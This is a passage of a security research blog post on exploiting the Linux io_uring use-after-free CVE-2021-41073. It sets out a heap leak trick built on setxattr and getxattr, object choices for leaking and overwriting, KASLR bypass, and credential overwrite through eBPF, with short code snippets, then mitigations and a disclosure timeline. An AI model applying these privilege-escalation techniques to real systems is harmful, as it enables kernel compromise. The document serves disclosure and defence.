Before thinking about which types of objects to overwrite, an information leak technique is needed to find where things are in memory (function addresses, credential structures, heap pointers, etc.). I realized I could turn the aforementioned technique from a universal heap spray primitive into a universal heap leak primitive with this one weird trick. In the original UAF use case for this technique, setxattr reallocates a buffer that has already been freed. But what if the setxattr buffer is freed instead?

One Weird Trick

First, use the heap spray technique: call setxattr, which blocks while copying the last 8 bytes from user space. At this point most of the data has already been copied over to the allocated kernel buffer. In another thread, trigger the freeing of the setxattr buffer using the bug. Then, trigger the allocation of the object to leak. This should reallocate and overwrite the kernel buffer that setxattr is using to store attribute data. Finally, unblock setxattr. Now the kernel will use the data in kvalue to set the file attribute. Extended file attributes are stored as binary data. To get an extended attribute of a file, we can use setxattr's counterpart, getxattr. Remember, by the time the attribute is set, the kernel buffer used has been overwritten with the data from the new object.

So, the contents of the object can be leaked by calling getxattr:

setxattr("lol.txt", "", xattr_buf, 32, 0);
getxattr("lol.txt", "", leakbuf, 32);

Target Objects

So far I've only spoken about general techniques. We haven't picked what objects we want to use along with the techniques. I haven't seen the objects I selected used in other exploits, so hopefully this can provide ideas for exploiting a difficult cache like kmalloc-32.

When first looking for objects, I looked within io_uring itself. There are a lot of interesting objects, many of which have pointers to cred and task_struct structures. I had not seen other kernel exploits using io_uring objects until recently, when I found a blog post by Awarau [25].

I used a few other methods to find target objects as well. One was using Linux kernel memory tracing on a test system and seeing what 32-byte objects are allocated. I also wrote a quick script using pahole to output all the structures of a specific size. One trick I learned from Alexander Popov's blog post is to enable features that are common across many distros, which increases the number of kernel objects available [26].

Objects for Leaking:


An io_tctx_node structure is allocated for a new thread that sends an io_uring request. There can be several io_tctx_nodes in a single process if multiple threads call into io_uring. The field to leak is task, the pointer to the thread's task_struct. The allocation of this object can be triggered by creating a new thread and making an io_uring system call.


The io_buffer structure is covered at length in the vulnerability section. The field to leak is list, a list_head structure that links the buffer to the rest of the buffers in the buf_group. Leaking this gives the relative position on the slab, so the address of the sprayed objects can be calculated. I later realized this object could also be used to gain an arbitrary free primitive, by modifying the list members and unregistering multiple buffers. This is just an idea; this technique wasn't used in this exploit.


A seq_operations structure is allocated when a process opens a seq_file. This structure stores pointers to the functions that perform sequential operations on the file. Opening /proc/cmdline allocates this structure. Leaking this object gives pointers to several functions. Specifically, I use the function single_next to break KASLR.
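The arithmetic for turning one leaked function pointer into a KASLR slide is simple enough to sketch. The helper names are hypothetical, and the non-randomized symbol addresses are assumed to come from the matching kernel build (for example its System.map).

```c
#include <assert.h>
#include <stdint.h>

/*
 * Compute the KASLR slide from one leaked function pointer.
 * `unslid_addr` is the symbol's address in the non-randomized image.
 */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t unslid_addr)
{
    assert(leaked_addr >= unslid_addr);
    return leaked_addr - unslid_addr;
}

/* Rebase any other symbol of the same image using the computed slide. */
uint64_t rebase(uint64_t unslid_addr, uint64_t slide)
{
    return unslid_addr + slide;
}
```

Once the slide is known from the leaked single_next pointer, every other kernel text symbol can be rebased the same way.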

Object for Overwriting:


An sk_filter structure is allocated when an already loaded eBPF program is attached to a socket. Of particular interest is the field prog, which contains a pointer to a bpf_prog structure that represents the attached eBPF program. By overwriting this pointer, we gain kernel execution. One thing to note: because prog is the last field in sk_filter, it's not covered by the n-8 bytes we can write using the techniques mentioned so far. However, this is easily fixable. Instead of blocking in setxattr, we call getxattr immediately after and block there. The setxattr kernel buffer will be reallocated in getxattr, and will be completely overwritten with the desired contents before blocking in copy_to_user.

Putting It All Together

As stated above, we gain execution by overwriting the prog pointer in an sk_filter. A bpf_prog structure has a field bpf_func, which contains a pointer to the function that gets called when the associated socket has data written to it. When the function is called, the second parameter contains a pointer to the bpf_prog field insns, which is an array of BPF instructions used by the eBPF interpreter.

At this point, there are a few options:

Use bpf_prog_run for the bpf_func field, which is the function that decodes and executes BPF instructions if the program is not JIT compiled. Then put eBPF bytecode instructions that overwrite creds in the insns array. This is an option even if eBPF JIT is configured. However, if the Kconfig option CONFIG_BPF_JIT_ALWAYS_ON is set, the interpreter is not compiled into the kernel.

Another option is to look for ROP gadgets in the kernel to call instead. This idea was inspired by Alexander Popov's original exploit for CVE-2021-26708 [26].

We need a gadget that will:

  1. Dereference the insns pointer, where we put the pointer &task_struct→cred
  2. Write 0 to the uid offset
  3. Write 0 to the euid offset
  4. Return

It's possible to get the return value of an eBPF program, so we can first leak the address of task→cred and then repeat the process with the uid and euid overwrites. With a leak, the operations can be split up into two ROP gadgets. This gives some flexibility in which gadgets can be used, and increases the likelihood of the kernel containing the necessary gadgets.
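To make the gadget's required semantics concrete, here is a plain user space model of the four steps above. It is only a simulation: mock_cred and gadget_zero_ids are hypothetical names, and the field layout is an assumption rather than the real struct cred of any particular kernel build.

```c
#include <assert.h>
#include <stdint.h>

/* Mock of the leading credential fields; the layout is assumed. */
struct mock_cred {
    int32_t  usage;
    uint32_t uid, gid, suid, sgid, euid, egid;
};

/*
 * Model of the desired gadget. `insns` points at a slot holding the
 * address of the task's cred pointer (the &task_struct->cred value).
 */
void gadget_zero_ids(void *insns)
{
    /* Step 1: dereference insns to reach the cred pointer field. */
    struct mock_cred **cred_field = *(struct mock_cred ***)insns;
    struct mock_cred *cred = *cred_field;

    assert(cred != 0);
    cred->uid = 0;   /* Step 2: write 0 at the uid offset. */
    cred->euid = 0;  /* Step 3: write 0 at the euid offset. */
}                    /* Step 4: return. */
```

In the two-gadget variant, the first call would only perform the loads and return the cred address, and the second call would perform the two writes.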

Last but not least, we have another option: JIT smuggling. This term, coined by Amy Burnett for browser exploitation, refers to tricking a JIT compiler into creating ROP gadgets for use in an exploit. The same technique can be used for the eBPF JIT compiler. Instead of leaking the address of single_next, leak the address of our original bpf_prog. We can use our original JIT compiled eBPF program to smuggle in the ROP gadgets we need. Since the program is on an executable page, we can call into any part of it. After calculating the offset in the program where the needed ROP gadget lies, write the address into the bpf_func field.

There are a lot of different ways to exploit this bug. I came up with a few more ideas while writing this blog post. Can you think of any more?


YouTube video

Download the proof-of-concept (PoC) exploit code along with a test VM here.


The io_uring subsystem introduces a large and rapidly growing body of kernel code that is reachable as an unprivileged user. It's a system call interface, so it is inherently hard to sandbox; we rely on system call filtering for sandboxing, e.g. seccomp and SELinux. Because io_uring redefines how user space interacts with the kernel, and is available to unprivileged users on kernels >= 5.1, which includes a growing number of Android devices, it will have a significant impact on the future of Linux kernel security.

I'll go over mitigations that offer some protection against the exploit techniques I've outlined in this post, and discuss their effectiveness. I'll also go over some considerations for the future of Linux kernel hardening.

Existing Mitigations

First I'll cover the mitigations for which I've already discussed bypasses:

CONFIG_SLAB_FREELIST_RANDOM randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This mitigation is useful for heap overflow bugs that rely on contiguous object allocation to be exploitable. However, I don't think it is particularly effective for UAFs or vulnerabilities giving a controllable free. As Jann Horn notes in this Linux kernel exploitation writeup, if you can control the order of what gets freed, then you can control the freelist, and the randomization is nullified [27]. There is a low performance cost to this mitigation, since the randomization only occurs when a new slab page is allocated.

CONFIG_BPF_JIT_ALWAYS_ON removes the eBPF interpreter from the kernel. The intent of this mitigation is to reduce the number of usable exploitation gadgets. While I've discussed a number of bypasses in the context of this exploit, it should always be set if eBPF JIT is enabled. As a mitigation, it comes at no performance cost and removes a potential primitive for attackers.

Some additional options:

CONFIG_BPF_UNPRIV_DEFAULT_OFF turns off eBPF for unprivileged users by default. It can be changed via a sysctl knob while the system is running. Whether this mitigation is appropriate depends on whether your system needs to let unprivileged users run eBPF programs. If not, turning off eBPF for unprivileged users reduces attack surface in terms of exploiting eBPF itself, and also makes eBPF unavailable for use as a primitive, as shown in this exploit. While this mitigation won't directly impact the exploitability of this vulnerability, it does block a very useful primitive. It will force an attacker to be more creative and come up with another way to gain kernel execution or read/write abilities.

CONFIG_SLAB_FREELIST_HARDENED checks whether a free object's metadata is valid. This mitigation won't protect against any of the techniques shown in this writeup, but it does block other primitives that could be built with the vulnerability. For example, if a kernel buffer is blocked on a user copy and then freed, the freelist metadata can be overwritten after the copy is unblocked, and an attacker gains control over the pointer to the next free object. This kind of freelist control primitive is blocked by this mitigation, which first checks whether the free object is actually within a valid slab page before allowing it to be allocated. There are some minor performance costs, which consist of performing a check for every freed object.

Future Considerations

Implementing control flow integrity for eBPF programs would block several of the techniques discussed in this post. When an eBPF program is verified and JIT compiled, the official entry point can be added to a list of valid targets that is checked before a program is run. This would block the previously discussed general ROP technique, the JIT smuggling technique, as well as the interpreter technique (if JIT is turned on).
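A toy user space model of that idea is sketched below: entry points are recorded at registration time and checked before every indirect call. All names here are hypothetical, and a real kernel implementation would look quite different; the sketch only illustrates the check itself.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef unsigned int (*prog_fn)(const void *ctx);

#define MAX_ENTRIES 16
static prog_fn valid_entries[MAX_ENTRIES];
static size_t nr_entries;

/* Record an entry point once a program has been verified and compiled. */
bool register_entry(prog_fn fn)
{
    if (nr_entries == MAX_ENTRIES)
        return false;
    valid_entries[nr_entries++] = fn;
    return true;
}

/* Linear scan of the list of valid call targets. */
bool is_valid_entry(prog_fn fn)
{
    for (size_t i = 0; i < nr_entries; i++)
        if (valid_entries[i] == fn)
            return true;
    return false;
}

/* Call fn only if it is a registered entry point; *ok reports the check. */
unsigned int checked_run(prog_fn fn, const void *ctx, bool *ok)
{
    assert(ok != NULL);
    *ok = is_valid_entry(fn);
    return *ok ? fn(ctx) : 0;
}

/* Stand-ins for a legitimate program and an attacker-chosen target. */
unsigned int sample_prog(const void *ctx) { (void)ctx; return 1; }
unsigned int rogue_target(const void *ctx) { (void)ctx; return 2; }
```

With such a check in place, an overwritten bpf_func that points at a kernel gadget, at the interpreter, or into the middle of a JIT image would fail the lookup instead of being called.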

The next consideration, while not a mitigation, is a simple but important measure to improve software security. The vulnerability exploited in this post would have easily been found if basic unit tests had been written for the IORING_OP_PROVIDE_BUFFERS feature. It was only after the second exploitable vulnerability in this feature was reported that any tests were committed [32]. Due to the rapid growth in both system call support and features of io_uring in the upstream kernel, it is important to include accompanying tests so that easily findable vulnerabilities like this one don't slip by.

Security Disclosure Timeline

9/8/2021: I find the vulnerability. I write a PoC to make sure my assumptions are correct.

9/11/2021: I report the vulnerability and share the PoC.

9/11/2021: The report is forwarded to the io_uring developers and acknowledged.

9/11/2021: A potential patch is provided.

9/12/2021: I review and test the patch. I confirm it fixes the issue. Jens asks me what email I want to use for my "Reported-by" tag. I reply with my work email, which concerns him because the domain name makes it obvious the patch is a security issue. I give my personal email instead, which he accepts.

9/13/2021: Greg K-H responds to my initial report, in which I state that I want to coordinate disclosure with the linux-distros mailing list so downstream consumers can apply the patch. He says that since most distros sync on stable releases, it's not necessary to get the distro list involved. I don't get the distro list involved.

9/13/2021: I apply for a CVE via MITRE. CVE-2021-41073 is reserved.

9/18/2021: The patch hits upstream and is backported to affected versions. I send out a disclosure via the OSS mailing list.

Reflection on the Linux Kernel and Security Fixes

First, I was impressed with the short time it took to go from initial report to pushing a fix. It's no secret that the Linux kernel community can be somewhat caustic to newcomers, but everyone that I interacted with was (mostly) cordial.

The reporting process, however, is confusing. The official documentation is outdated and inconsistent, and it seems everyone who has reported kernel vulnerabilities does so slightly differently. For the most part, everyone emails the linux-distros mailing list, and sometimes a CVE ID is reserved that way. In my case though, I did not contact the linux-distros list because Greg said it wasn't necessary. Submitting patches is also done via mailing list (so, sent via email). The whole process is hard to grasp when compared to modern methods of issue tracking. This recent blog post contains the relevant information that I wish I had available at the time [29].

Another thing that I noticed is the general culture around security fixes in the Linux kernel. While this is nothing new, I was surprised to see how it permeates down to a small level [30]. Small things such as modifying "Reported-by" tags because the email has "security" in the domain name, or removing a CVE identifier from a commit message, seem to be a common occurrence [31]. What's the benefit gained by obfuscating a security issue, particularly one that already has an assigned CVE?

Exploitable vulnerabilities are patched in the upstream kernel without a CVE, or even an appropriate commit message identifying them as security bugs, all the time. The implications of this are simple: it has prevented patches for exploitable vulnerabilities from being backported, and these vulnerabilities are later exploited in the wild [28]. Attackers are capable of looking through commits to find these hidden vulnerabilities, and they're incentivized to do so. Defenders shouldn't be burdened with this as well.

I believe that for Linux kernel security to improve, an up-to-date, simple guide on how to report a vulnerability needs to be agreed upon and released. Additionally, transparency about which patches address security issues will help prevent downstream consumers from shipping vulnerable software.


At Grapl, security is truly our highest priority. Offensive security research is a major driver for how we build our product. With this work, we've taken active measures to harden our production environment in the following ways:

  1. Establish where we want to enforce boundaries. We don't rely on the vanilla Linux kernel to enforce security boundaries around sensitive code, we take significant measures to limit kernel attack surface, and we use VMs managed by a restricted Firecracker process for isolation. This allows us to significantly reduce our trust in the kernel.
  2. Continue to track and investigate areas of the kernel that are high attack surface, as we've done here.
  3. Audit our operating system images to ensure that we're leveraging all possible mitigations against techniques like those described here.


Vitaly Nikolenko, for great Linux kernel exploitation research. I used his universal heap spray technique in my exploit and as a basis for my universal heap leak technique.

Jann Horn, for great Linux kernel exploitation research. I used his research on schedulers as well as FUSE blocking in my exploit.

Alexander Popov, for great Linux kernel exploitation research. I used his research as a guide on how to build this exploit.

Andréa, for her amazing work creating the diagrams in this post.

Ryota Shiga, for his great post on exploiting io_uring. This post helped me understand io_uring internals when getting started.

netspooky, for the blog post title, edits, and general moral support.

Grapl and the Grapl team, for supporting this research.


  1. up/an-introduction-to-the-io-uring-asynchronous-io-framework
  3. https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html
  4. https://unixism.net/loti/what_is_io_uring.html
  5. https://lwn.net/Articles/810414/
  7. https://unixism.net/loti/tutorial/sq_poll.html
  8. https://unixism.net/loti/async_intro.html
  11. https://dwelling windows-and-linux-implementations/
  14. https://lwn.net/Articles/813311/
  17. page-from-kernels-e-book-tlb-tell.html
  18. https://www.spinics.net/lists/io-uring/msg09009.html
  29. with-a-patch
